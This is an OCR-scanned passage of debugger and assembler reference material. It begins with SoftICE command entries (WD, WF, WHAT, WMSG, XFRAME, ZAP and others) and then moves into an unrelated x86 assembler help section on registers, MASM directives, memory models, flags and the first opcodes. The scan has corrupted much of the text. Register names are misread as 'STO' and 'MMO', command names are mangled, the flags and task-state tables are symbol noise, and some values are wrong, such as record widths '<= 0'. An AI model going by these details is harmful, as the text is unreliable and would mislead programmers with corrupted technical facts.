%Syntax 
WD [window-size] 


window-size Decimal number. 


%Use 

If you do not specify the window-size, WD toggles the Data window open or 
closed. If the 

Data window is closed, WD opens it; and if it is open, WD closes it. 

If you specify the window-size, the Data window is resized. If it is closed, WD 
opens it to the 

specified size. 


when the Data window is closed, the extra screen lines are added to the Command 
window. 


When the Data window is opened, the lines are taken from the other windows in 
the 
following order: Command and Code. 


If you wish to move the cursor to the Data window to edit data, use the E 
command. 


%Example 

If the Data window is closed, the following example displays the window and 
sets it to one 

line. If the Data window is open, the example sets it to one line. 

WD 1 


:WF 

AWF WINDOWS 95, WINDOWS NT WINDOWCONTROL 

ACTRL-F3 

ADisplay the floating point stack in either floating point or MMX format. 


%Syntax 
WF [-d] [b|]w|d]|f}] %] 


-d Display the floating point stack in the Command window. In addition 

to the registers, both the FPU status word and the FPU control word 

display in ASCII format. 

b Display the floating point stack in byte hexadecimal format. 

w Display the floating point stack in word hexadecimal format. 

d Display the floating point stack in dword hexadecimal format. 

f Display the floating point stack in 10-byte real format. 

* Display the ©’next'' format. The ©*'' keyword is present to allow cycling 
through all the display formats by pressing a function key. 
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%Use 

WF with no parameters toggles the display of the floating point Register 
window. The 

window occupies four lines and is displayed immediately below the Register 
window. In 10 

byte real format, the registers are labeled STO-ST7. In all other formats the 
registers are 

labeled MMO-MM7. 


If the floating point stack contains an unmasked exception, SoftICE will NOT 
display the 

stack contents. When reading the FPS, SoftICE obeys the tag bits and displays 
'empty' if the 

tag bits specify that state. 


When displaying in the Command window, SoftICE displays both the status word 
and the 
control word in ASCII format. 


%Example 

WF -d f 

FPU Status Word: top=2 

FPU Control Word: PM UM OM ZM DM IM pc=3 rc=0 
STO 1.619534411708533451e-289 


ST1 9.930182991407099205e-293 
ST2 6.779357630001165015e-296 
ST3 4.274541060856685014e -299 
ST4 2.782904336495237639e-302 
ST5 1.818657819582844735e-305 
ST6 empty 

ST7 empty 


Note: ASCII flags are documented in the INTEL Pentium Processor User's Manual, 
° Architecture and Programming, '' Volume 3. 


When displaying in any of the hexadecimal formats, SoftICE always display left 
to right from 

most significant to least significant. For example, in word format, the 
following order would 

be used: 

Word format: bits(63-48) bits(47-32) bits(31-16) bits(15-0) 


: WHAT 
AMWHAT Windows 95, Windows NT SystemInformation 
ADetermine if a name or expression is a © known'' type. 


%Syntax 
WHAT [name | expression] 


name Any symbolic name that cannot evaluate as an expression. 
expression Any expression that can be interpreted as an expression. 


%Use 

The WHAT command analyzes the parameter specified and compares it to known 

names/values, enumerating each possible match, until no more matches can be 
found. Where 

appropriate, type identification of a match is expanded to indicate relevant 
information such 

as a related process or thread. 


The name-type parameter is typically a collection of alphanumeric characters 
that represent 
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the name of an object. For example, Explorer would be interpreted as a name, 
and might be 
identified as either a module, a process, or both. 


The expression-type parameter is something that would not generally be 
considered a name- 

type. That is, it is a number, a complex expression (an expression which 
contains operators, 

such as Explorer + 0), or a register name. Although a register looks like a 
name, registers are 

special cased as expressions since this usage is much more common. For example, 
for WHAT 

eax, the parameter eax is interpreted as an expression-type. Symbol names are 
treated as 

names, and will be correctly identified by the WHAT command as symbols. 


Because the rules for determining name- and expression-types can be ambiguous 
at times, you 

can force a parameter to be evaluated as a name-type by placing it in quotes. 
For example, for 

WHAT © ‘eax'', the quotes force eax to be interpreted as a name-type. To force a 
parameter that 

might be interpreted as a name-type to an expression-type, use the unary +'! 
operator. For 

example, for WHAT +Explorer, the presence of the unary ©+'' operator forces 
Explorer to be 

interpreted as a symbol, instead of a name. 


%Example 

The following is an example of using the WHAT command on the name Explorer and 
the 

resulting output. From the output, you can see that the name Explorer was 
identified twice: 

once as a kernel process and once as a module. 

WHAT explorer 

The name (explorer) was identified and has the value FD854A80 

The value (FD854A80) is a Kernel Process (KPEB) for Explorer(58) 

The name (explorer) was identified and has the value 1000000 

The value (1000000) is a Module Image Base for 'Explorer' 


:WL 

AWL Windows 95, Windows NT Window Control Command 

AToggles the Locals window open or closed; and sets the size of the Locals 
window. 


%Syntax 
WL [window-size] 


window-size Decimal number. 


%Use 

If you do not specify the window-size, WL toggles the Locals window open or 
closed. If the 

Local window is closed, WL opens it; and if it is open, WL closes it. 


If you specify the window-size, the Locals window is resized. If it is closed, 
WL opens it to the 

specified size. 

when the Locals window is closed, the extra screen lines are added to the 
Command window. 
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When the Locals window is opened, the lines are taken from the other windows in 
the 
following order: Command and Code. 


Hint: From within the Locals window, you can expand structures, arrays, and 
character 

strings to display their contents. Simply double-click the item you want to 
expand. 


Note that expandable items are delineated with a plus (+) mark. 


%Example 

If the Locals window is closed, the following example displays the window and 
sets it to four 

lines. If the Locals window is open, the example sets it to four lines. 

WL 4 


: WMSG 
AWMSG Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay the names and message numbers of Windows messages. 


%Syntax 
For Windows 3.1 
WMSG [partial-name] 


For Windows 95 and Windows NT 
WMSG [partial-name| msg-number] 


partial-name Windows message name or the first few characters of a Windows 
message name. If multiple Windows messages match the partial-name 

then all messages that start with the specified characters display. 
msg-number Hexadecimal message number of the message. Only the message that 
matches the msg-number displays. 


%Use 

This command displays the names and message numbers of Windows messages. It is 
useful 

when logging or setting breakpoints on Windows messages with the BMSG command. 


%Example 

This command displays the names and message numbers of all Windows messages 
that start 

with "WM_GET". 

WMSG wm_get* 


A sample output for this command follows: 
000D WM_GETTEXT 

000E WM_GETTEXTLENGTH 

0024 WM_GETMINMAXINFO 

0031 WM_GETFONT 

0087 WM_GETDLGCODE 

WMSG 111 

0111 WM_Command 


: WR 

AWR WINDOWS 3.1, WINDOWS 95, WINDOWS NT WINDOWCONTROL 
AF2 

AToggle the Register window. 


%Syntax 
WR 
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%Use 

The WR command makes the Register window visible if it is not currently 
visible. If the 

Register window is currently visible, WR closes the Register window. 


The Register window displays the 80386 register set and the processor flags. 


when the Register window is closed, the extra screen lines are added to the 
Command 
window. 


When the Register window is made visible, the lines are taken from the other 
windows in the 
following order: Command, Code and Data. 


For Windows 95 and Windows NT 

The WR command also toggles the visibility of the floating point Register 
window if one is 

open. 


"WWW 

MW WINDOWS 3.1, WINDOWS 95, WINDOWS NT WINDOWCONTROL 

AAIt-F4 

AToggles the Watch window open or closed; and sets the size of the Watch window. 


%Syntax 
WW [window-size] 


window-size Decimal number. 


%USse 

If you do not specify the window-size, WW toggles the Watch window open or 
closed. If the 

Watch window is closed, WwW opens it; and if it is open, WW closes it. 


If you specify the window-size, the Watch window is resized. If it is closed, 
Ww opens it to 
the specified size. 


when the Watch window is closed, the extra screen lines are added to the 
Command window. 


When the Watch window is opened, the lines are taken from the other windows in 
the 
following order: Command, Code, and Data. 


%Example 

If the Watch window is closed, the following example displays the window and 
sets it to four 

lines. If the Watch window is open, the example sets it to four lines. 

Www 4 


iX 

AX WINDOWS 3.1, WINDOWS 95, WINDOWS NT FLOWCONTROL 
NAF5 

NAExit from the SoftICE screen. 


%Syntax 
X 
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%Use 

The X command exits SoftICE and restores control to the program that was 
interrupted to 

bring up SoftICE. The SoftICE screen disappears. If you had set any 
breakpoints, they 

become active. 


Note: while in SoftICE, pressing the hot key sequence (default key Ctrl-D) or 
entering the 
G command without any parameters is equivalent to entering the X command. 


:XFRAME 
AXFRAME Windows 95, Windows NT SystemInformation 
ADisplay exception handler frames that are currently installed. 


%Syntax 
XFRAME [except-frame* | thread-type] 


except-frame* Stack pointer value for an exception frame. 
thread-type Value that SoftICE recognizes as a thread. 


%Use 

Exception frames are created by Microsoft's Structured Exception Handling API 
(SEH). 

Handlers are instantiated on the stack, so they are context specific. 


when an exception handler is installed, information about it is recorded in the 
current stack 

frame. This information is referred to as an ExceptionRegistration. The XFRAME 
command 

understands this information, and walks backwards through stack frames until it 
reaches the 

top-most exception handler. From there it begins displaying each registration 
record up to the 

currently active scope. From each registration, it determines if the handler is 
active or inactive; 

its associated "global exception handler;" and if the handler is active, the 
SEH type: try/except 

or try/finally: In the case of active exception handlers, it also displays the 
exception filter or 

finally handler address. 


Note: The global exception handler is actually an exception dispatcher that 
uses information 

within an exception scope table to determine which, if any, exception handler 
handles 

the exception. It also handles other tasks such as global and local unwinds. 
You can use the global exception handler, and try/except/finally addresses to 
trap SEH 

exceptions by setting breakpoints on appropriate handler addresses. 

The XFRAME command is context-sensitive, so if you do not specify one of the 
optional 

parameters, SoftICE reverts to the context that was active at pop-up time and 
displays the 

exception frames for the current thread. when specifying an exception frame 
pointer as an 

optional parameter, make sure you are in a context where that exception frame 
is valid. For 

thread-type parameters, SoftICE automatically switches to the correct context 
for the thread. 

Below the information for the ExceptionRegistration record, each active handler 
for that 
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exception frame is listed. For each active handler, its type (try/except or 
try/finally), the 

address of its exception filter (for try/except only), and the address of the 
exception handler 

display. Because exception handlers can be nested, more than one entry may be 
listed for each 

ExceptionRegistration record. 


The XFRAME command uses bare addresses in its output. You can use either the 
STACK or 
WHAT commands to get an idea of which APIs installed which exception handlers. 


Do not confuse the xScope value with the nesting level of exception handlers. 
Although these 

values may appear to have some correlation, the value of xScope is simply an 
index into a 

scope table (xTable). The scope table entry contains a link to its parent scope 
(if any). 

In the event that a stack frame is not present, the XFRAME will not be able to 
complete the 

stack walk. 


%Output 
For each exception frame that is installed, the following information displays: 
xFrame Address of the ExceptionRegistration. This value is stack based. 
xHandler Address of the global exception handler which dispatches the 
exception to the appropriate try/except/finally filter/handler. 
xTable Address of the scope table used by the global exception handler to 
dispatch exceptions. 
xScope Index into the xTable for the currently active exception handler. If 
this 
value is -1, the exception handler is installed, but is inactive and will 
not trap an exception. 


%Example 
The following example illustrates the use of the XFRAME command for the 
currently active 
thread: 
. :XFRAME 
xFrame xHandler xTable xScope 
0x45FFFDC 0x60639638 0x606018B8 00 
try/except (0000) filter=0x60606F72, handler=0x60606F85 
0x45FFFA8 0x5FE16890 0x5FE11210 00 
try/except (0000) filter=0x5FE125EB, handler=0x5FE125F8 
0x45FFB74 0x77F8B1BC 0x77F61370 00 
try/except (0000) filter=0x77F7DD21, handler=0x77F7DD31 


1XG 
AXG Windows 3.1, Windows 95 Symbol/Source 
AGo to an address in trace simulation mode. 


%Syntax 
XG [r] address 


%Use 

XG does a Go to a specific code address within the back trace history buffer. 
This command 

can only be used in trace simulation mode. The R parameter makes XG go 
backwards within 

the back trace history buffer. If the specified address is not found within the 
back trace history 

buffer, an error displays. 
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%Example 

This example makes the instruction at address CS:2FF000h the current 
instruction in the 

back trace history buffer. 

XG 2ff000 


XP 

AXP WINDOWS 3.1, WINDOWS 95 SYMBOL/SOURCE 
ACtrl-F10 

AProgram step in trace simulation mode. 


%Syntax 
XP 


%Use 

The XP command does a program step of the current instruction in the back trace 
history 

buffer. It can only be used in trace simulation mode. Use this command to skip 
over calls to 

procedures and rep string instructions. 


%Example 

This example does a program step over the current instruction in the back trace 
history buffer. 

XP 


:XRSET 
AXRSET WINDOWS 3.1, WINDOWS 95 SYMBOL/SOURCE COMMAND 
ARreset the back trace history buffer. 


%Syntax 
XRSET 


%Use 

XRSET clears all information from the back trace history buffer. It can only be 
used when 

NOT in trace simulation mode. 


%Example 
This example clears the back trace history buffer. 
XRSET 


XT 

AXT WINDOWS 3.1, WINDOWS 95 SYMBOL/SOURCE COMMAND 
ACtrl-F8, XT R Alt-F8 

ASingle step in trace simulation mode. 


%Syntax 
XT [R] 


%Use 
Use the XT command to single step the current instruction in the back trace 
history buffer. 


The XT command is valid only within the in trace simulation mode. This command 
steps to 

the next instruction contained in the back trace history buffer. The command XT 
R single 

steps backwards within the back trace history buffer. 
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%Example 

This example single steps one instruction forward in the back trace history 
buffer. 

XT 


: ZAP 
AZAP WINDOWS 3.1, WINDOWS 95, WINDOWS NT MODE CONTROL COMMAND 
AReplace an embedded interrupt 1 or 3 with a NOP. 


%Syntax 
ZAP 


%Use 

The ZAP command replaces an embedded interrupt 1 or 3 with the appropriate 
number of 

NOP instructions. This is useful when the INT 1 or INT 3 is placed in code that 
is repeatedly 

executed and you no longer want SoftICE to pop up. This command works only if 
the INT 1 

or INT 3 instruction is the one before the current CS:EIP. 


%Example 

The embedded interrupt 1 or interrupt 3 will be replaced with NOP instructions 
in the 

following example: 

ZAP 


Pagina 784 di 991 


@Assembler Programming Topics 
:8086 architecture 
AIntel 8086 Family Architecture 


% General Purpose Registers Segment Registers 
AH/AL AX  (EAX) Accumulator CS Code Segment 
BH/BL BX (EBX) Base DS Data Segment 
CH/CL CX (ECX) Counter SS Stack Segment 
DH/DL DX (EDX) Data ES Extra Segment 
(FS) 386 and newer 
(Exx) indicates 386+ 32 bit register (GS) 386 and newer 
% Pointer Registers Stack Registers 
SI (ESI) Source Index SP (ESP) Stack Pointer 
DI (EDI) Destination Index BP (EBP) Base Pointer 
IP Instruction Pointer 
% Status Registers 


FLAGS Status Flags (see -FLAGS-) 


% Special Registers (386+ only) 
CRO Control Register 0 DRO Debug Register 0 
CR2. Control Register 2 DR1 Debug Register 1 
CR3. Control Register 3 DR2 Debug Register 2 


DR3 Debug Register 3 


TR4 Test Register 4 DR6 Debug Register 6 
TR5 Test Register 5 DR7 Debug Register 7 
TR6 Test Register 6 
TR7 Test Register 7 
% Register Default Segment Valid Overrides 
BP SS DS, ES, CS 
SI or DI DS ES, SS, CS 
DI strings ES None 
SI strings DS ES, SS, CS 
- see -CPU- -DETECTING- -—Instruction Timing- 


‘Instruction Timing 
AInstruction Clock Cycle Calculation 


Some instructions require additional clock cycles due to a "Next 
Instruction Component" identified by a "+m" in the instruction 
clock cycle listings. This is due to the prefetch queue being 
purge on a control transfers. Below is the general rule for 
calculating "m": 


88/86 not applicable 

286 "m" is the number of bytes in the next instruction 

386 "m" is the number of components in the next instruction 
(the instruction coding (each byte), plus the data and 
the displacement are all considered components) 
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A8088/8086 Effective Address (EA) Calculation 
% Description Clock Cycles 


Displacement 

Base or Index (BX,BP,SI,DI) 
Displacement+(Base or Index) 
Base+Index (BP+DI,BX+SI) 
Base+Index (BP+SI,BX+DI) 
Base+Index+Displacement (BP+DI,BX+SI) 11 
Base+Index+Displacement (BP+SI+disp,BX+DI+disp) 12 


0 NOU0OD 


- add 4 cycles for word operands at odd addresses 
- add 2 cycles for segment override 
- 80188/80186 timings differ from those of the 8088/8086/80286 


% Task State Calculation 


"TS" is defined as switching from VM/486 or 80286 TSS to one of 
the following: 


DARAAAAAAAAAAAAARARAAAARARAAAAAAAAARARAA, 
3 New Task 3 


UAAAAAAAAAAAAAKA "486 TSS?486 TSS®386 TSS?386 TSS?286 TSS? 
PACO ORF o LL Ho e 


386 TSS (VM=1) 3 i 3 314 3 231 3 287 È 


% Miscellaneous 


- all timings are for best case and do not take into account wait 
states, instruction alignment, the state of the prefetch queue, 
DMA refresh cycles, cache hits/misses or exception processing. 

- to convert clocks to nanoseconds divide one microsecond by the 
processor speed in MegaHertz: 


A(1000MHz/(n MHz)) = X nanoseconds 


- see -8086 Architecture- 


:directives:asm directives 
AMacro Assembler Directives 


AProcessor Code Generation Directives 


.186 enables assembly of 80186 instructions 

.286 enables assembly of non privileged 80286 instructions 
.286C same as .286 

.286P enables assembly of all 80286 instructions 

.287 enabled assembly of 80287 instructions 

.386 enabled assembly of non privileged 80386 instructions 
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If used before .MODEL segments are defined as 32bits. 
Causes all segments to default to DWORD alignment. 
.386P enabled assembly of all 80386 instructions (see .386) 
.387 enabled assembly of 80387 instructions 
.8086 default, enables assembly of 8088/8086 instruction 
.8087 default, enables assembly of 8087 instructions 


These directives must precede the segment they are to effect. 
they cannot occur within a segment. 


AMemory Model Directives 


.CODE [name] starts code segment; must follow .MODEL directive 

. CONST starts a constant data segment with name CONST; 
must follow .MODEL directive; placed in DGROUP 

. DATA starts a near data segment for initialized data 


with name _DATA; must follow .MODEL directive; 
placed in DGROUP 

. DATA? starts a near data segment for uninitialized 
data with name _BSS; must follow .MODEL 
directive; placed in DGROUP 

.FARDATA [name] not placed in any group 

.FARDATA? [name] not placed in any group 

.MODEL model defines memory model to be one of the following: 
SMALL, COMPACT, MEDIUM, LARGE or HUGE; must be 
used prior to any other segment directive 

.STACK [size] indicates start of stack segment named 'STACK' 
with size indicating number of bytes to reserve, 
default is 1k; placed in DGROUP 


ASegment Definition, Segment Ordering and Linkage Directives 


. ALPHA orders segments alphabetically 

.SEQ orders segments sequentially (default) 

ASSUME sreg:name [,Ssreg:name...] selects default segment 
register to be used by the assembler, not the CPU, 
for addressing all symbols in the segment or group. 
Name must be associated with a SEGMENT or GROUP 
or set to "NOTHING" to indicate no segment register 
is to be associated. 

COMM def [,def...] defines variables that are both public and 
external (communal). Can be used in and include 
file to identify it to each source file without 
declaring it in each model as extern. Actually 
defines data once. Communal variables cannot be 
initialized, and are not guaranteed to be allocated 
contiguously since these are allocated by the linker. 

DOSSEG orders segments the same as DOS. This is Microsoft 
languages default order; causes paragph alignment 

END [name] marks end of source module and sets program 
start address (CS:IP) if 'name' is present 

name ENDP ends procedure 'name' 
name ENDS ends a segment or structure 

EXTRN name:type [,name:type...] defines one or more external symbols 

name GROUP seg[,seg] 


name LABEL [NEAR|FAR|PROC] defines an entry point; If PROC is specified, 
it's value depends on the current MODEL 
NAME pgmName ignored since MASM 5.0; used to set module name 


name PROC [NEAR|FAR] defines procedure; NEAR/FAR has .MODEL default 
PUBLIC name[,name...] makes symbol 'name' available to other modules 
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name SEGMENT [align][combine][use]['class'] 


align = BYTE align on byte address (no alignment) 
= WORD align on even address 
= DWORD align on DWORD address 
= PARA align on next 16 byte paragraph 
= PAGE align on next 256 byte boundary 


combine = PUBLIC similar named segments are concatenated (CS) 
STACK similar named segments are concatenated (SS) 
COMMON similar named segment are overlapped 

MEMORY similar names segments are concatenated 

AT addr segment relative to absolute address 

nothing segment is private and loaded independent 
USE16 segments will be 16 bits (if .386) 

USE32 segments will be 32 bits (if .386) 


use 


AData Allocation Directives 


ALIGN n aligns next variable or instruction on a boundary 
that is a multiple of "n". This can speed memory 
fetches on 16 and 32 bit CPU'S if aligned. New to 
-MASM- 5.0, previous versions used EVEN. Can result 
in NOP's added to code. 


[name] DB init[,init...] define byte 

[name] DD init[,init...] define double word (DWORD, 4 bytes) 
[name] DF init[,init...] define far word (FWORD, 386, 6 bytes) 
[name] DQ init[,init...] define quad word (QWORD, 8 bytes) 
[name] DT init[,init...] define temp word (TBYTE, 10 bytes) 
[name] DW init[,init ] define word (WORD, 2 bytes) 


count DUP (init[,init...]) duplicate 'init' 'count' times; DUP can be 
nested to 17 levels; DUP'ed initial values 
of (?) don't result in data in the object file 
but instead increment the next data addr 


name ENDS end of structure or segment 
EVEN same as align 2; Aligns data on even boundary 
ORG expr sets location counter to 'expr'; If 'expr'! 
is '$' the code is ORG'ed at the current loc. 
name RECORD fld[,fld...] defines a byte or word variable 


consisting of bit fields; fields have the format: 
fieldname:width[=expr]; the sum of all widths 
must be <= 0 

[name] STRUC <[init[,init]]> defines beginning of a structure; Values 
between <> are initializers; The '<>' symbols 
are required. 


ALogical and Bit Oriented Directives 


expr1 AND expr2 returns nonzero if any set bit matches 
expr1 EQ expr2 returns (-1) for true or (0) for false 
expr1 GE expr2 returns (-1) for true or (0) for false 
expr1 LE expr2 returns (-1) for true or (0) for false 
expr1 LT expr2 returns (-1) for true or (0) for false 
MASK {fldname|record} returns bit mask for bits in record 
expr1 OR expr2 returns bitwise OR on expr1 and expr2 
NOT expr returns 'expr' with all bits reversed 
expr SHL count returns expr shifted left count times 
expr SHR count returns expr shifted right count times 


WIDTH {fldname|record} returns width of field in bit record 
expr1 XOR expr2 returns bitwise XOR on expr1 and expr2 


AOther Operators and Directives 
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[] index operator, same as addition 
. MSFLOAT encode floats in Microsoft Real Format 
. TYPE expr returns byte defining mode and scope of expr 

name EQU  expr assigns expression to name. surround text with <> 
HIGH expr returns high byte of 'expr'! 
INCLUDE filespec inserts code from 'filespec' into file 
INCLUDELIB filespec stores link library info in .0BJ file 


LENGTH var returns number of data objects in DUPed 'var' 
LOW. expr returns low byte of 'expr' 

expri MOD expr2 return remainder of expr1/expr2 
OFFSET expr returns offset of expr; When .MODEL is used 


the offset of a group relative segment refers 
to the end of the segment 


type PTRexpr forces 'expr' to 'type' 
SEG expr returns segment of expression 
SHORT sets type of label to short, less than 128 


bytes from start of next instruction 

SIZE var returns # of bytes allocated by DUP directive 

THIS type returns an operand of specified type whose 
offset and segment values are equal to the 
current location 

TYPE expr returns type of expression 


% Program Listing and Documentation Directives 
. CREF restores listing of cross reference symbols 
. LALL include macro expansion in listings 
. LFCOND include false conditional blocks in listings 
. LIST starts listing of statements 
. SALL suppress listing of all macro expansions 
. SFCOND suppress false conditional blocks in listings 
. XALL start listing of macro expansion 
.XCREF [name[,name...]] suppress symbols in cross reference 
.XLIST suppress program listing 
COMMENT delimiter [text] 
PAGE [[len],wid] sets page length&width or ejects if no parms 
SUBTTL text defines program listing subtitle 


TITLE text defines program listing title 


% Condition Assembly Directives 
ELSE else clause for conditional assembly block 
ENDIF terminates a conditional assembly block 


IFDEF name conditional assembly if name is defined 


% Macro Definition Directives 
ENDM terminates a macro block 
EXITM exit macro expansion immediately 


IRP_ parm,<arg[,arg...]> parm in the statements enclosed by the 
IRP and ENDM will be repeated and replaced with the 
values of "arg" for each "arg" in the <>. 

IRPC parm,<string> parm in the statements enclosed by the IRPC 
and ENDM will be repeated and replaced with the values 
of each char in the "string" for each character 
position in the string. "string" should be enclosed 
in <> if it contains spaces or other separators. 

LOCAL name[,name...] defines scope symbol as local to a macro 

name MACRO [parm[,parm...]] defines a macro and it's parameters 
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% 


% 


% 


PURGE name[, name] purges macros from memory 
REPT expr repeats all statements through ENDM statement for 
'expr' times 


User Message Directives 


. ERR generates and error 

.ERR1 generates an error on PASS 1 

. ERR2 generates an error on PASS 2 

.ERRB <arg> generates an error if 'arg' is blank 

.ERRDEF name generates an error if 'name' is previously defined 


.ERRDIF[I] <arg1>,<arg2> 
.ERRE expr generates and error is 'expr' is false 
%OUT text displays 'text' to console 


Predefined Equates (available only if simplified segments are used) 


@curseg contains the current segment 
@filename current file name without extension 
@code contains the current code segment 


@codesize © for small & compact, 1 for large, medium & huge 
@datasize © for small & medium, 1 for compact & large, 2=huge 


@const contains segment of define by .CONST 
@data contains segment of define by .DATA 
@data? contains segment of define by .DATA? 


@fardata contains segment of define by .FARDATA 
@fardata? contains segment of define by .FARDATA? 
@stack contains segment of define by .STACK 


Most of these are only available if the simplified segment system 
is used. @curseg and @filename are available regardless. 


Radix Specifiers 


.RADIX expr sets radix [2..16] for numbers (dec. default) 
binary data specifier 

octal data specifier 

octal data specifier 

decimal data specifier 

hexadecimal data specifier 


TUOOO 


:masm options:assembler options 
AMicrosoft Assembler Command Line Options 


AMASM [options] srcfile[, [objfile][,[lstfile][,[xreffile]]]][;] 


% 


Options Definition 

/A generate segments in alphabetical order 

/B[Ssize] sets I/0 buffer size in K bytes (1..63, default 32) 
/C generate cross reference file with .CRF extension 

/D generate PASS 1 listing 

/Dsym[=val] define symbol for use during assembly 

/E emulate floating point instructions (for use with HLL) 
/H list options and command syntax 

/Ipath include-file search path 

/L generate listing file with .LST extension 

/ML case sensitive for all symbols 

/MU upper case all symbols (default) 

/MX case sensitive in external and public symbols 
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% 


/N suppress symbol tables in listings 


/P check for impure code in 286 and 386 protected 
mode (invalid CS overrides) 
/S generate segments in the order they are found (default) 
/T terse message display; display errors only 
/N verbose message display; includes # lines and symbols 


/W{0|1|2} assembly warning level 
O = no warnings 
1 = severe warnings only 
2 = all warnings enabled 


/X display complete conditional assembly blocks in 
listing including false conditionals 

/Z display errors including line numbers to screen 

/ZD generate line numbers in .0BJ files 

/ZI generate both symbolic and line number information in 
.OBJ files 


Environment Variables 


INCLUDE search path for include files 
MASM default command line options 


:flags register:8086 flags 
AFLAGS - Intel 8086 Family Flags Register 


3113103F3E3D3C3B3A393837363534333231303 

3 33 3 3 3 3 3 3 3 3 3 3 3 3 3 3 ÀAAA CF Carry Flag 
3 34 #37 43 3 373-731 79 29%) 137 3 3% 30° 3 53 ÀAAA 1 

3 3: 133: 8. 3 3 3: "3. «3 33 3. 3° 3 ÀAAA PF Parity Flag 

3 33 3 3 3 3 3 3 3 3 3 3 3 ÀAAA (o) 

3 3 3 3 3 3 3 3 3 3 3 3 3 AAAA AF Auxiliary Flag 

3 33 3 3 3 3 3 3 3 3 3 ÀAKAA 0 

3 3 3 3 3 3 3 3 3 3 3 AAAA ZF Zero Flag 

3 33 3 3 3 3 3 3 3 AAA SF Sign Flag 

3 3 3 3 3 s 3 s 3 AAAA TF Trap Flag (Single Step) 

3 3 3 3 3 s 3 s AAAA IF Interrupt Flag 

3 3 3 3 3 s 3 AAAA DF Direction Flag 

3 3 3 3 3 s AAAA OF Overflow flag 

3 3 3 3 AAAAAA IOPL L/0 Privilege Level (286+ only) 
3 3 3 AAAAAA NT Nested Task Flag (286+ only) 

33 AAAAAA 0 

3 AAAAAA RF Resume Flag (386+ only) 


ana VM Virtual Mode Flag (386+ only) 


- see -PUSHF- -POPF- -STI- -CLI- -STD- -CLD- 


:models:segment names 
AMemory Model Programming & Segment Information 


% 


Model 
TINY Data and code fit in one 64K segment. All code and 
data are accessed via near pointers. 
SMALL 64k data segment max and 64k code segment max. All 
code and data are accessed via near pointers. 
COMPACT 1Mb data segment max and 64K code segment max. Code 
is accessed via near pointers, data is accessed via 
far pointers. No array can be greater than 64K 
MEDIUM 64K data segment max and 1Mb code segment max. Code is 
accessed via far pointers, data is accessed vianear pointers. 
LARGE 1Mb data segment max and 1Mb code segment max. All 
code and data are accessed via far pointers. No 
single element can be greater than 64K. 
HUGE i1Mb data segment max and 1Mb code segment max. All 
code and data are accessed via far pointers. This is 
the only model where arrays can be larger than 64K. 
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In this mode is C will normalize all data pointers 
to avoid segment wrapping. 


ASmall Memory Model 


% Directive Segment Alignment Combine Class 
. CODE _TEXT. WORD PUBLIC 'CODE' 
. DATA _DATA WORD PUBLIC 'DATA' 
. CONST CONST WORD PUBLIC 'CONST' 
. DATA? _BSS WORD PUBLIC 'BSS' 
. STACK STACK — PARA STACK "STACK' 


ACompact Memory Model 


% Directive Segment Alignment Combine Class 
. CODE _TEXT. WORD PUBLIC 'CODE' 
. FARDATA FAR_DATA PARA private 'FAR_DATA' 
. FARDATA? FAR_BSS PARA private 'FAR_BSS' 
. DATA _DATA WORD PUBLIC 'DATA' 
. CONST CONST WORD PUBLIC 'CONST' 
. DATA? _BSS WORD PUBLIC 'BSS' 
. STACK STACK PARA STACK "STACK' 


AMedium Memory Model 


% Directive Segment Alignment Combine Class 
.CODE  name_TEXT WORD PUBLIC 'CODE' 
. DATA _DATA WORD PUBLIC 'DATA' 
. CONST CONST. WORD PUBLIC 'CONST' 
. DATA? _BSS WORD PUBLIC 'BSS' 
. STACK STACK — PARA STACK "STACK' 


ALarge or Huge Memory Models 


% Directive Segment Alignment Combine Class 
. CODE name_TEXT WORD PUBLIC 'CODE' 
. FARDATA FAR_DATA PARA private 'FAR_DATA' 
. FARDATA? FAR_BSS PARA private 'FAR_BSS' 
. DATA _DATA WORD PUBLIC 'DATA' 
. CONST CONST WORD PUBLIC 'CONST' 
. DATA? _BSS = WORD PUBLIC 'BSS' 
. STACK STACK PARA STACK "STACK' 


- all segments fall into DGROUP except for ???_TEXT, FAR_DATA 
and FAR_BSS 
- see -MASM DIRECTIVES- 
:imsw:machine status word 
AMSW - Machine Status Word (286+ only) 


831330-534333231303 Machine Status Word 

3 3 3 s 3 AAAAA Protection Enable (PE) 
3 s 3 AAAAAA Math Present (MP) 

3 s AAAAAAA Emulation (EM) 

3 AAAAAAKA Task Switched (TS) 
AAAAAAAAA Extension Type (ET) 
AAAAAAAAAKA Reserved 

AAAAAAAAAAAAAA Paging (PG) 


3 
3 
3 
3 


WU _Wè Wd W Wù wW 
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Bit 0 PE Protection Enable, switches processor between 


protected and real mode 


Bit 1 MP Math Present, controls function of the -WAIT- 


instruction 

Bit 2 EM Emulation, indicates whether coprocessor functions 
are to be emulated 

Bit 3 TS Task Switched, set and interrogated by coprocessor 
on task switches and when interpretting coprocessor 
instructions 

Bit 4 ET Extension Type, indicates type of coprocessor in 
system 


Bits 5-30 Reserved 


bit 31 PG Paging, indicates whether the processor uses page 
tables to translate linear addresses to physical 


addresses 
- see -SMSW- -LMSW- 


‘aaa 
AAAA - Ascii Adjust for Addition 


Usage: AAA 


Modifies flags: AF CF (0F,PF,SF,ZF undefined) 


Changes contents of AL to valid unpacked decimal. The high order 


nibble is zeroed. 


% Clocks 
% Operands 808x 286 386 486 


none 8 3 4 3 
- see —-Instruction Timing- 
:aad 


AAAD - Ascii Adjust for Division 


Usage: AAD 


Modifies flags: SF ZF PF (AF,CF,0F undefined) 


Used before dividing unpacked decimal 


numbers. Multiplies AH by 


10 and the adds result into AL. Sets AH to zero. This instruction 


is also known to have an undocumented 


% Clocks 
% Operands 808x 286 386 486 
none 60 14 19 14 


- see -Instruction Timing- 


‘aam 
AAAM - Ascii Adjust for Multiplication 
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behavior. 


Usage: AAM 
Modifies flags: PF SF ZF (AF,CF,0F undefined) 


Used after multiplication of two unpacked decimal numbers, this 
instruction adjusts an unpacked decimal number. The high order 
nibble of each byte must be zeroed before using this instruction. 
This instruction is also known to have an undocumented behavior. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none 83 16 17 15 2 


- see —Instruction Timing- 
‘aas 


AAAS - Ascii Adjust for Subtraction 


Usage: AAS 
Modifies flags: AF CF (0F,PF,SF,ZF undefined) 


Corrects result of a previous unpacked decimal subtraction in AL. 
High order nibble is zeroed. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none 8 3 4 3 1 


- see —Instruction Timing- 


:adc 
AADC - Add With Carry 


Usage: ADC dest, src 
Modifies flags: AF CF OF SF PF ZF 


Sums two binary operands placing the result in the destination. 
If CF is set, a 1 is added to the destination. 


% Clocks Size 

